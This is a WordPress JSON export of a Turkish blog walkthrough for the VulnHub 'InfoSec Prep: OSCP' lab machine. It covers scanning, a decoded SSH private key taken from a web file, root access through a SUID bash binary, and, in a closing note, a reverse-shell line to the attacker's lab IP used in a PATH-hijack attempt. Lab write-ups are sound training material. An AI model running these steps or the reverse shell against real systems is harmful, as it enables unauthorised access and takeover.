{"id":1292,"date":"2021-07-01T20:52:49","date_gmt":"2021-07-01T20:52:49","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1292"},"modified":"2021-07-01T20:52:49","modified_gmt":"2021-07-01T20:52:49","slug":"infosec-prep-oscp","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/01\/infosec-prep-oscp\/","title":{"rendered":"INFOSEC PREP: OSCP"},"content":{"rendered":"<h2>Makine Hakk\u0131nda Bilgiler<\/h2>\n<p><strong>A\u00e7\u0131klama:<\/strong><br \/>\nThis box should be easy. This machine was created for the InfoSec Prep Discord Server (<a href=\"https:\/\/discord.gg\/RRgKaep\">https:\/\/discord.gg\/RRgKaep<\/a>) as a give way for a 30d voucher to the OSCP Lab, Lab materials, and an exam attempt.<\/p>\n<p>The box was created with VMWare Workstation, but it should work with VMWare Player and Virtualbox. Upon booting up it should display an IP address. This is the target address based on whatever settings you have. You should verify the address just incase.<\/p>\n<p>Find the flag.txt in \/root\/ and submit it to the TryHarder bot on Discord to enter the give away. The command is only available for so long. So if you are just joining the server or doing the box for fun, the command won't be there any longer at a later time.<\/p>\n<p>Please do not publish any write ups for this box until August 7, 2020 as this is probably when the give away will end. After that, fair game!<\/p>\n<p>A big thanks to Offensive Security for providing the OSCP voucher.<\/p>\n<p>Box created by FalconSpy with the support of the staff at InfoSec Prep Discord Server<\/p>\n<p><strong>Vulnhub Sayfas\u0131:<\/strong><br \/>\n<a href=\"https:\/\/www.vulnhub.com\/entry\/infosec-prep-oscp,508\/\">https:\/\/www.vulnhub.com\/entry\/infosec-prep-oscp,508\/<\/a><\/p>\n<p><strong>\u0130ndirme Sayfas\u0131:<\/strong><br \/>\n<a href=\"https:\/\/download.vulnhub.com\/infosecprep\/oscp.zip\">https:\/\/download.vulnhub.com\/infosecprep\/oscp.zip<\/a><\/p>\n<h2>Walkthrough<\/h2>\n<p>Makineyi tespit ederek ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# arp-scan -l | grep 59:35\n192.168.31.101  08:00:27:21:59:35   PCS Systemtechnik GmbH\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# ifconfig eth0\neth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 192.168.31.108  netmask 255.255.255.0  broadcast 192.168.31.255\n        inet6 fe80::a00:27ff:fe8b:5efb  prefixlen 64  scopeid 0x20&lt;link&gt;\n        ether 08:00:27:8b:5e:fb  txqueuelen 1000  (Ethernet)\n        RX packets 173649503  bytes 37545501589 (34.9 GiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 167696811  bytes 19140661012 (17.8 GiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n<\/code><\/pre>\n<p>nmap taramas\u0131 ile devam edelim.<\/p>\n<pre><code class=\"language-sh\">[*] Scan: 181\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-01 16:35 EDT\nNmap scan report for oscp (192.168.31.101)\nHost is up (0.00036s latency).\nNot shown: 65532 closed ports\nPORT      STATE SERVICE VERSION\n22\/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 91:ba:0d:d4:39:05:e3:13:55:57:8f:1b:46:90:db:e4 (RSA)\n|   256 0f:35:d1:a1:31:f2:f6:aa:75:e8:17:01:e7:1e:d1:d5 (ECDSA)\n|_  256 af:f1:53:ea:7b:4d:d7:fa:d8:de:0d:f2:28:fc:86:d7 (ED25519)\n80\/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))\n|_http-generator: WordPress 5.4.2\n| http-robots.txt: 1 disallowed entry \n|_\/secret.txt\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n|_http-title: OSCP Voucher &amp;#8211; Just another WordPress site\n33060\/tcp open  mysqlx?\n| fingerprint-strings: \n|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: \n|     Invalid message&quot;\n|_    HY000\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port33060-TCP:V=7.91%I=7%D=7\/1%Time=60DE271D%P=x86_64-pc-linux-gnu%r(NU\nSF:LL,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(GenericLines,9,&quot;\\x05\\0\\0\\0\\x0b\\x\nSF:08\\x05\\x1a\\0&quot;)%r(GetRequest,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(HTTPOpt\nSF:ions,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(RTSPRequest,9,&quot;\\x05\\0\\0\\0\\x0b\\\nSF:x08\\x05\\x1a\\0&quot;)%r(RPCCheck,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(DNSVersi\nSF:onBindReqTCP,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(DNSStatusRequestTCP,2B\nSF:,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#039;\\x1a\\x0fIn\nSF:valid\\x20message\\&quot;\\x05HY000&quot;)%r(Help,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%\nSF:r(SSLSessionReq,2B,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\\nSF:x10\\x88&#039;\\x1a\\x0fInvalid\\x20message\\&quot;\\x05HY000&quot;)%r(TerminalServerCookie,\nSF:9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(TLSSessionReq,2B,&quot;\\x05\\0\\0\\0\\x0b\\x0\nSF:8\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#039;\\x1a\\x0fInvalid\\x20message\\&quot;\\\nSF:x05HY000&quot;)%r(Kerberos,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(SMBProgNeg,9,\nSF:&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(X11Probe,2B,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x\nSF:1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#039;\\x1a\\x0fInvalid\\x20message\\&quot;\\x05HY00\nSF:0&quot;)%r(FourOhFourRequest,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(LPDString,9\nSF:,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(LDAPSearchReq,2B,&quot;\\x05\\0\\0\\0\\x0b\\x08\nSF:\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#039;\\x1a\\x0fInvalid\\x20message\\&quot;\\x\nSF:05HY000&quot;)%r(LDAPBindReq,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(SIPOptions,\nSF:9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(LANDesk-RC,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x0\nSF:5\\x1a\\0&quot;)%r(TerminalServer,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(NCP,9,&quot;\\\nSF:x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(NotesRPC,2B,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\nSF:\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#039;\\x1a\\x0fInvalid\\x20message\\&quot;\\x05HY000&quot;\nSF:)%r(JavaRMI,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(WMSRequest,9,&quot;\\x05\\0\\0\\\nSF:0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(oracle-tns,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(\nSF:ms-sql-s,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(afp,2B,&quot;\\x05\\0\\0\\0\\x0b\\x08\nSF:\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#039;\\x1a\\x0fInvalid\\x20message\\&quot;\\x\nSF:05HY000&quot;)%r(giop,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;);\nMAC Address: 08:00:27:21:59:35 (Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 4.X|5.X\nOS CPE: cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel:5\nOS details: Linux 4.15 - 5.6\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.36 ms oscp (192.168.31.101)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 47.13 seconds\n<\/code><\/pre>\n<p>ssh, http ve mysqlx a\u00e7\u0131k. http ile ba\u015flayal\u0131m. Ayr\u0131ca robots.txt'de secret isimli bir dosya g\u00f6z\u00fck\u00fcyor.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/oscp]\n\u2514\u2500# cat gobuster.txt \n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.31.101\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-big.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              html,bak,txt,php5,py,log,php,sql,zip,rar,7z,cgi\n[+] Add Slash:               true\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/07\/01 14:41:00 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/192.168.31.101\/icons\/               (Status: 403) [Size: 279]\nhttp:\/\/192.168.31.101\/wp-content\/          (Status: 200) [Size: 0]  \nhttp:\/\/192.168.31.101\/index.php            (Status: 200) [Size: 32895]\nhttp:\/\/192.168.31.101\/wp-login.php         (Status: 200) [Size: 4829] \nhttp:\/\/192.168.31.101\/license.txt          (Status: 200) [Size: 19915]\nhttp:\/\/192.168.31.101\/wp-includes\/         (Status: 200) [Size: 46134]\nhttp:\/\/192.168.31.101\/javascript\/          (Status: 403) [Size: 279]  \nhttp:\/\/192.168.31.101\/readme.html          (Status: 200) [Size: 7278] \nhttp:\/\/192.168.31.101\/robots.txt           (Status: 200) [Size: 36]   \nhttp:\/\/192.168.31.101\/secret.txt           (Status: 200) [Size: 3502] \nhttp:\/\/192.168.31.101\/wp-trackback.php     (Status: 200) [Size: 135]  \nhttp:\/\/192.168.31.101\/wp-admin\/            (Status: 200) [Size: 4829] \nhttp:\/\/192.168.31.101\/xmlrpc.php           (Status: 405) [Size: 42]   \nhttp:\/\/192.168.31.101\/wp-signup.php        (Status: 200) [Size: 4971] \nhttp:\/\/192.168.31.101\/server-status\/       (Status: 403) [Size: 279] <\/code><\/pre>\n<p>gobuster \u00e7\u0131kt\u0131s\u0131da yukar\u0131da verilmi\u015ftir. secret dosyas\u0131 dolu. Bu dosyaya gitti\u011fimde bir base64 oldunu anlad\u0131m ancak ssh-keygen i\u00e7in fazla uzun g\u00f6z\u00fck\u00fcyordu bende decode ettim. Decode etti\u011fimde a\u015fa\u011f\u0131daki sonucu ald\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/oscp]\n\u2514\u2500# cat id          \n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAtHCsSzHtUF8K8tiOqECQYLrKKrCRsbvq6iIG7R9g0WPv9w+gkUWe\nIzBScvglLE9flolsKdxfMQQbMVGqSADnYBTavaigQekue0bLsYk\/rZ5FhOURZLTvdlJWxz\nbIeyC5a5F0Dl9UYmzChe43z0Do0iQw178GJUQaqscLmEatqIiT\/2FkF+AveW3hqPfbrw9v\nA9QAIUA3ledqr8XEzY\/\/Lq0+sQg\/pUu0KPkY18i6vnfiYHGkyW1SgryPh5x9BGTk3eRYcN\nw6mDbAjXKKCHGM+dnnGNgvAkqT+gZWz\/Mpy0ekauk6NP7NCzORNrIXAYFa1rWzaEtypHwY\nkCEcfWJJlZ7+fcEFa5B7gEwt\/aKdFRXPQwinFliQMYMmau8PZbPiBIrxtIYXy3MHcKBIsJ\n0HSKv+HbKW9kpTL5OoAkB8fHF30ujVOb6YTuc1sJKWRHIZY3qe08I2RXeExFFYu9oLug0d\ntHYdJHFL7cWiNv4mRyJ9RcrhVL1V3CazNZKKwraRAAAFgH9JQL1\/SUC9AAAAB3NzaC1yc2\nEAAAGBALRwrEsx7VBfCvLYjqhAkGC6yiqwkbG76uoiBu0fYNFj7\/cPoJFFniMwUnL4JSxP\nX5aJbCncXzEEGzFRqkgA52AU2r2ooEHpLntGy7GJP62eRYTlEWS073ZSVsc2yHsguWuRdA\n5fVGJswoXuN89A6NIkMNe\/BiVEGqrHC5hGraiIk\/9hZBfgL3lt4aj3268PbwPUACFAN5Xn\naq\/FxM2P\/y6tPrEIP6VLtCj5GNfIur534mBxpMltUoK8j4ecfQRk5N3kWHDcOpg2wI1yig\nhxjPnZ5xjYLwJKk\/oGVs\/zKctHpGrpOjT+zQszkTayFwGBWta1s2hLcqR8GJAhHH1iSZWe\n\/n3BBWuQe4BMLf2inRUVz0MIpxZYkDGDJmrvD2Wz4gSK8bSGF8tzB3CgSLCdB0ir\/h2ylv\nZKUy+TqAJAfHxxd9Lo1Tm+mE7nNbCSlkRyGWN6ntPCNkV3hMRRWLvaC7oNHbR2HSRxS+3F\nojb+JkcifUXK4VS9VdwmszWSisK2kQAAAAMBAAEAAAGBALCyzeZtJApaqGwb6ceWQkyXXr\nbjZil47pkNbV70JWmnxixY31KjrDKldXgkzLJRoDfYp1Vu+sETVlW7tVcBm5MZmQO1iApD\ngUMzlvFqiDNLFKUJdTj7fqyOAXDgkv8QksNmExKoBAjGnM9u8rRAyj5PNo1wAWKpCLxIY3\nBhdlneNaAXDV\/cKGFvW1aOMlGCeaJ0DxSAwG5Jys4Ki6kJ5EkfWo8elsUWF30wQkW9yjIP\nUF5Fq6udJPnmEWApvLt62IeTvFqg+tPtGnVPleO3lvnCBBIxf8vBk8WtoJVJdJt3hO8c4j\nkMtXsvLgRlve1bZUZX5MymHalN\/LA1IsoC4Ykg\/pMg3s9cYRRkm+GxiUU5bv9ezwM4Bmko\nQPvyUcye28zwkO6tgVMZx4osrIoN9WtDUUdbdmD2UBZ2n3CZMkOV9XJxeju51kH1fs8q39\nQXfxdNhBb3Yr2RjCFULDxhwDSIHzG7gfJEDaWYcOkNkIaHHgaV7kxzypYcqLrs0S7C4QAA\nAMEAhdmD7Qu5trtBF3mgfcdqpZOq6+tW6hkmR0hZNX5Z6fnedUx\/\/QY5swKAEvgNCKK8Sm\niFXlYfgH6K\/5UnZngEbjMQMTdOOlkbrgpMYih+ZgyvK1LoOTyMvVgT5LMgjJGsaQ5393M2\nyUEiSXer7q90N6VHYXDJhUWX2V3QMcCqptSCS1bSqvkmNvhQXMAaAS8AJw19qXWXim15Sp\nWoqdjoSWEJxKeFTwUW7WOiYC2Fv5ds3cYOR8RorbmGnzdiZgxZAAAAwQDhNXKmS0oVMdDy\n3fKZgTuwr8My5Hyl5jra6owj\/5rJMUX6sjZEigZa96EjcevZJyGTF2uV77AQ2Rqwnbb2Gl\njdLkc0Yt9ubqSikd5f8AkZlZBsCIrvuDQZCoxZBGuD2DUWzOgKMlfxvFBNQF+LWFgtbrSP\nOgB4ihdPC1+6FdSjQJ77f1bNGHmn0amoiuJjlUOOPL1cIPzt0hzERLj2qv9DUelTOUranO\ncUWrPgrzVGT+QvkkjGJFX+r8tGWCAOQRUAAADBAM0cRhDowOFx50HkE+HMIJ2jQIefvwpm\nBn2FN6kw4GLZiVcqUT6aY68njLihtDpeeSzopSjyKh10bNwRS0DAILscWg6xc\/R8yueAeI\nRcw85udkhNVWperg4OsiFZMpwKqcMlt8i6lVmoUBjRtBD4g5MYWRANO0Nj9VWMTbW9RLiR\nkuoRiShh6uCjGCCH\/WfwCof9enCej4HEj5EPj8nZ0cMNvoARq7VnCNGTPamcXBrfIwxcVT\n8nfK2oDc6LfrDmjQAAAAlvc2NwQG9zY3A=\n-----END OPENSSH PRIVATE KEY-----\n<\/code><\/pre>\n<p>Harika bir private key'imiz var. Bununla ba\u011flanmay\u0131 deneyelim. http'de wordpress oldu\u011funu anlad\u0131k ve anasayfada \u015f\u00f6yle bir post vard\u0131.<\/p>\n<pre><code>Oh yea! Almost forgot the only user on this box is \u201coscp\u201d. <\/code><\/pre>\n<p>Okay! oscp ile giri\u015f denedim ve ba\u015far\u0131l\u0131 oldum.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/oscp]\n\u2514\u2500# ssh oscp@192.168.31.101 -i id          \nWelcome to Ubuntu 20.04 LTS (GNU\/Linux 5.4.0-40-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n System information disabled due to load higher than 1.0\n\n0 updates can be installed immediately.\n0 of these updates are security updates.\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\n\nLast login: Sat Jul 11 16:50:11 2020 from 192.168.128.1\n-bash-5.0$ whoami\noscp\n-bash-5.0$ pwd\n\/home\/oscp<\/code><\/pre>\n<p>Bu noktadan sonra standart scriptlerimi \u00e7al\u0131\u015ft\u0131rd\u0131m ve suid bitlerinde bir \u015fey dikkatimi \u00e7ekti..<\/p>\n<pre><code>[!] fst020 Uncommon setuid binaries........................................ yes!\n---ore--(7%)\n\/snap\/snapd\/12398\/usr\/lib\/snapd\/snap-confine\n\/snap\/snapd\/8140\/usr\/lib\/snapd\/snap-confine\n\/snap\/core18\/1754\/bin\/mount\n\/snap\/core18\/1754\/bin\/ping\n\/snap\/core18\/1754\/bin\/su\n\/snap\/core18\/1754\/bin\/umount\n\/snap\/core18\/1754\/usr\/bin\/chfn\n\/snap\/core18\/1754\/usr\/bin\/chsh\n\/snap\/core18\/1754\/usr\/bin\/gpasswd\n\/snap\/core18\/1754\/usr\/bin\/newgrp\n\/snap\/core18\/1754\/usr\/bin\/passwd\n\/snap\/core18\/1754\/usr\/bin\/sudo\n\/snap\/core18\/1754\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core18\/1754\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core18\/2074\/bin\/mount\n\/snap\/core18\/2074\/bin\/ping\n\/snap\/core18\/2074\/bin\/su\n\/snap\/core18\/2074\/bin\/umount\n\/snap\/core18\/2074\/usr\/bin\/chfn\n\/snap\/core18\/2074\/usr\/bin\/chsh\n\/snap\/core18\/2074\/usr\/bin\/gpasswd\n\/snap\/core18\/2074\/usr\/bin\/newgrp\n\/snap\/core18\/2074\/usr\/bin\/passwd\n\/snap\/core18\/2074\/usr\/bin\/sudo\n\/snap\/core18\/2074\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core18\/2074\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core20\/1026\/usr\/bin\/chfn\n\/snap\/core20\/1026\/usr\/bin\/chsh\n\/snap\/core20\/1026\/usr\/bin\/gpasswd\n\/snap\/core20\/1026\/usr\/bin\/mount\n\/snap\/core20\/1026\/usr\/bin\/newgrp\n\/snap\/core20\/1026\/usr\/bin\/passwd\n\/snap\/core20\/1026\/usr\/bin\/su\n\/snap\/core20\/1026\/usr\/bin\/sudo\n\/snap\/core20\/1026\/usr\/bin\/umount\n\/snap\/core20\/1026\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1026\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/bash\n---ore--(7%)\n<\/code><\/pre>\n<p>\/usr\/bin\/bash suid olarak eklenmi\u015f \ud83d\ude00 shell kolay. Do\u011frusunu s\u00f6ylemek gerekirse ba\u015fka bir yol daha vardr diye uzun s\u00fcre arad\u0131m ancak path manip\u00fclasyonu yapmay\u0131 d\u00fc\u015f\u00fcnd\u00fc\u011f\u00fcm bir a\u015famda ne yaz\u0131kki ba\u015far\u0131l\u0131 olamad\u0131m. Sadece bununla shell alabildim.<\/p>\n<pre><code class=\"language-sh\">-bash-5.0$ \/usr\/bin\/bash -p\nbash-5.0# id\nuid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp)\nbash-5.0# cd \/root\nbash-5.0# ls\nfix-wordpress  flag.txt  snap\nbash-5.0# cat flag.txt \nd73b04b0e696b0945283defa3eee4538\n<\/code><\/pre>\n<p>Basit!<\/p>\n<p><strong>Not<\/strong>: Path manip\u00fclasyonu ile ilgili yapmaya \u00e7al\u0131\u015ft\u0131klar\u0131m...<\/p>\n<pre><code class=\"language-sh\">-bash-5.0$ nano kuday\n-bash-5.0$ chmod 777 kuday \n-bash-5.0$ .\/kuday \n-bash-5.0$ \n-bash-5.0$ \n-bash-5.0$ cat kuday \nbash -i &gt;&amp; \/dev\/tcp\/192.168.31.108\/1822 0&gt;&amp;1\n-bash-5.0$ \n-bash-5.0$ \n-bash-5.0$ cat \/usr\/local\/bin\/get-ip-wordpress \n#!\/bin\/sh\n\n\/sbin\/ifconfig | grep inet | grep -v &quot;127.0.0.1&quot; | grep -v inet6 | awk &#039;{ print &quot;http:\/\/&quot;$2 }&#039;\n-bash-5.0$ \n-bash-5.0$ \n-bash-5.0$ mv kuday grep\n-bash-5.0$ \n-bash-5.0$ export PATH=\/tmp:$PATH\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Hakk\u0131nda Bilgiler A\u00e7\u0131klama: This box should be easy. This machine was created for the InfoSec Prep Discord Server (https:\/\/discord.gg\/RRgKaep) as a give way for&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/01\/infosec-prep-oscp\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">INFOSEC PREP: OSCP<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1292","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1292","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1292"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1292\/revisions"}],"predecessor-version":[{"id":1293,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1292\/revisions\/1293"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1292"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1292"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1292"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}